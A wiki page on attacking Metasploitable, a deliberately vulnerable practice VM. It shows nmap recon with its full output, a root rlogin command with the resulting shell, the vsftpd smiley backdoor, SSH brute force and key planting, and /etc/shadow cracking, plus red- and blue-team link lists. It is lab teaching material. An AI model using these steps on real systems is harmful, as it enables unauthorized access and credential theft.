Metasploitable
From charlesreid1
Metasploitable is a virtualbox for pentesting practice.
Contents
Services
For reference, a list of services running on the metasploitable machine:
Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 10.0.0.27 21 tcp ftp open vsftpd 2.3.4 10.0.0.27 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0 10.0.0.27 23 tcp telnet open Linux telnetd 10.0.0.27 25 tcp smtp open Postfix smtpd 10.0.0.27 53 tcp domain open ISC BIND 9.4.2 10.0.0.27 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2 10.0.0.27 111 tcp rpcbind open 2 RPC #100000 10.0.0.27 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 10.0.0.27 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP 10.0.0.27 512 tcp exec open netkit-rsh rexecd 10.0.0.27 513 tcp login open 10.0.0.27 514 tcp tcpwrapped open 10.0.0.27 1099 tcp java-rmi open Java RMI Registry 10.0.0.27 1524 tcp shell open Metasploitable root shell 10.0.0.27 2049 tcp nfs open 2-4 RPC #100003 10.0.0.27 2121 tcp ftp open ProFTPD 1.3.1 10.0.0.27 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5 10.0.0.27 3632 tcp open 10.0.0.27 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7 10.0.0.27 5900 tcp vnc open VNC protocol 3.3 10.0.0.27 6000 tcp x11 open access denied 10.0.0.27 6667 tcp irc open Unreal ircd 10.0.0.27 6697 tcp open 10.0.0.27 8009 tcp ajp13 open Apache Jserv Protocol v1.3 10.0.0.27 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1 10.0.0.27 8787 tcp open
Recon
Make a box for stuff:
$ mkdir -p box/metasploitable
Start by using nmap to scan the host.
First a fast scan -F:
$ nmap -F 10.0.0.*
Then we can do a more extensive scan:
$ nmap -sS 10.0.0.*
This reveals the IP address of the VirtualBox, which is 10.0.0.27.
We can also do a deeper scan:
$ nmap -sS -sV -A 10.0.0.27
This will reveal an array of services, some of which may be exploitable using metasploit.
Sure enough, the verbose scan returns lots of good information:
$ nmap -sS -sV -A 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT Nmap scan report for 10.0.0.27 Host is up (0.016s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX | Not valid before: 2010-03-17T14:07:45 |_Not valid after: 2010-04-16T14:07:45 |_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time. 53/tcp open domain ISC BIND 9.4.2 | dns-nsid: |_ bind.version: 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 42810/tcp mountd | 100005 1,2,3 45599/udp mountd | 100021 1,3,4 34385/tcp nlockmgr | 100021 1,3,4 60702/udp nlockmgr | 100024 1 38085/udp status |_ 100024 1 52004/tcp status 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login? 514/tcp open tcpwrapped 1099/tcp open java-rmi Java RMI Registry 1524/tcp open shell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 | mysql-info: | Protocol: 53 | Version: .0.51a-3ubuntu5 | Thread ID: 8 | Capabilities flags: 43564 | Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression | Status: Autocommit |_ Salt: w$K,8vk7k8tagd@PR*zK 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) | vnc-info: | Protocol version: 3.3 | Security types: |_ Unknown security type (33554432) 6000/tcp open X11 (access denied) 6667/tcp open irc Unreal ircd | irc-info: | users: 1 | servers: 1 | lusers: 1 | lservers: 0 | server: irc.Metasploitable.LAN | version: Unreal3.2.8.1. irc.Metasploitable.LAN | uptime: 0 days, 1:05:20 | source ident: nmap | source host: 6D4CD63B.D3975B40.7B559A54.IP |_ error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) |_ajp-methods: Failed to get a valid response for the OPTION request 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/5.5 MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP |_ System time: 2016-03-22T21:31:31-04:00 TRACEROUTE HOP RTT ADDRESS 1 16.11 ms 10.0.0.27 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
MySQL
See MSF/MySQL for the MySQL exploits using Metasploit framework.
PostgreSQL
One of the services running on metasploitable is PostgreSQL (a.k.a. postgres), so let's continue with the sql theme:
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
Rlogin
This one is trivial: ports 512, 513, and 514 are open for "r" servcies. A service has been misconfigured to allow remote access connections from any host.
All you need to do is ask nicely for root!
First, make sure rsh-client is installed, otherwise it will revert to SSH and ask for a password:
# apt-get install rsh-client
Now ask nicely for root:
# rlogin -l root 10.0.0.27 Last login: Tue Mar 22 20:26:16 EDT 2016 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ You have new mail. root@metasploitable:~#
This machine is now totally compromised!
VSFTP
The particular version of vsftp that is running on metasploitable contains a malicious backdoor that was slipped into the source code. If the username ends in a smiley :) the ftp server will open a listening shell on port 6200.
SSH
There are several ways to get into a machine using SSH.
SSH Brute Force
(The caveman approach)
The first is to attempt to log in via brute force, using a tool like hydra. This is extremely slow, and requires a list of users on the remote machine. This might come, for example, from the contents of /etc/passwd, which gives you a list of all users on the system. This would enable you to brute-force passwords for some or all users. But if you have access to /etc/passwd, you probably have access to /etc/shadow. These two can be used with John the Ripper to crack login passwords much, much, much faster. Hydra is very slow.
Metasploitable/SSH/Brute Force
SSH Keys
If you have WRITE access to the filesystem through an exploit such as the rlogin trick above, or through a PHP shell introduced through a web app vulnerability, or through a netcat payload, you can generate an SSH key for the attacker machine, and add it to the list of trusted hosts on the remote machine. This enables you to login without a password. This method requires WRITE access to the filesystem, so it needs to be coupled with an NFS or other remote shell exploit.
SSH Exploits
Old or unpatched versions of SSH, or weak cryptographic settings, can also be exploited.
More info at Metasploitable/SSH/Exploits
Shadow File
John the Ripper
You can use the /etc/passwd and /etc/shadow files to crack passwords on a Unix system. You "unshadow" the shadow file (using John the Ripper), then guess at the passwords (using John the Ripper).
General notes about cracking /etc/shadow with John: John the Ripper/Shadow File
Metasploitable-specific notes: Metasploitable/John Shadow File
Network File System
(Also see Linux/File Server page for general notes on NFS in Linux.)
DNS Bind
The DNS bind server that is running on port 53 can be poisoned using Metasploit. This takes some care in executing, even locally.
Apache
Attacking Apache with Metasploit: Metasploitable/Apache
Attacking Apache with Python: Metasploitable/Apache/Python
Tor's Hammer: Metasploitable/TorsHammer
WebDAV
Abusing WebDAV: Metasploitable/Apache/DAV
Flags
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|